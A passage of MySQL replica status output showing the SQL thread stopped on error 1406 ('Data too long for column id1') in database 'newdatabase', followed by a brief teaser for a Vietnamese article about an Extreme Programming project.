                  Master_User: slave_user
                  Master_Port: 3307
                Connect_Retry: 60
              Master_Log_File: mysql-bin.003895
          Read_Master_Log_Pos: 1965103
               Relay_Log_File: mysqld-relay-bin.000394
                Relay_Log_Pos: 83593238
        Relay_Master_Log_File: mysql-bin.003892
             Slave_IO_Running: Yes
            Slave_SQL_Running: No
              Replicate_Do_DB: 
          Replicate_Ignore_DB: 
           Replicate_Do_Table: 
       Replicate_Ignore_Table: 
      Replicate_Wild_Do_Table: 
  Replicate_Wild_Ignore_Table: 
                   Last_Errno: 1406
                   Last_Error: Error 'Data too long for column 'id1' at row 1' on query. Default database: 'newdatabase'
                 Skip_Counter: 0
          Exec_Master_Log_Pos: 83593075
              Relay_Log_Space: 316678540
              Until_Condition: None
               Until_Log_File: 
                Until_Log_Pos: 0
           Master_SSL_Allowed: No
           Master_SSL_CA_File: 
           Master_SSL_CA_Path: 
              Master_SSL_Cert: 
            Master_SSL_Cipher: 
               Master_SSL_Key: 
        Seconds_Behind_Master: NULL

The Ultimate XP Project

  (Bài chia sẻ của tác giả  Ryo Amano ) Trong  bài viết  số này, tôi muốn viết về dự án phát triển phần mềm có áp dụng nguyên tắc phát triển...